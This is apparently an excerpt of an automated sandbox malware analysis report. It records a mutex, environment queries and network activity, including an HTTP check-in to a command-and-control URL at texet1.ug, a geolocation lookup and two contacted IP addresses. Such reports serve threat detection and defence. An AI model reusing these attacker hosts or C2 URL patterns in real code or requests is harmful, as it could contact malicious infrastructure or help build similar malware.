Create	mutex_name = {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}		1	Fn

Environment (2)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		2	Fn Data

Network Behavior

HTTP Sessions (2)

Information	Value
Total Data Sent	626 bytes
Total Data Received	7.40 KB
Contacted Host Count	2
Contacted Hosts	77.123.139.189, 85.143.221.137

HTTP Session #1

Information	Value
User Agent	Microsoft Internet Explorer
Server Name	texet1.ug
Server Port	80
Username	-
Password	-
Data Sent	159 bytes
Data Received	285 bytes

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = http, server_name = texet1.ug, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /AJshdd74568oHIUHSusf6441/Asjdioaiuf738/get.php	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://texet1.ug/AJshdd74568oHIUHSusf6441/Asjdioaiuf738/get.php?pid=8B157CC8DF5AC1E8931FA0BF05996F06	1	Fn
Read Response	size = 1024, size_out = 103	1	Fn Data
Close Session	-	1	Fn

HTTP Session #2

Information	Value
Server Name	api.2ip.ua
Server Port	443
Username	-
Password	-
Data Sent	467 bytes
Data Received	7.12 KB

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = https, server_name = api.2ip.ua, server_port = 443	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json	1	Fn
Read Response	size = 10240, size_out = 465	1	Fn Data
Close Session	-	1	Fn

Remarks (2/2)

Monitored Processes

Behavior Information - Grouped by Category

Before

After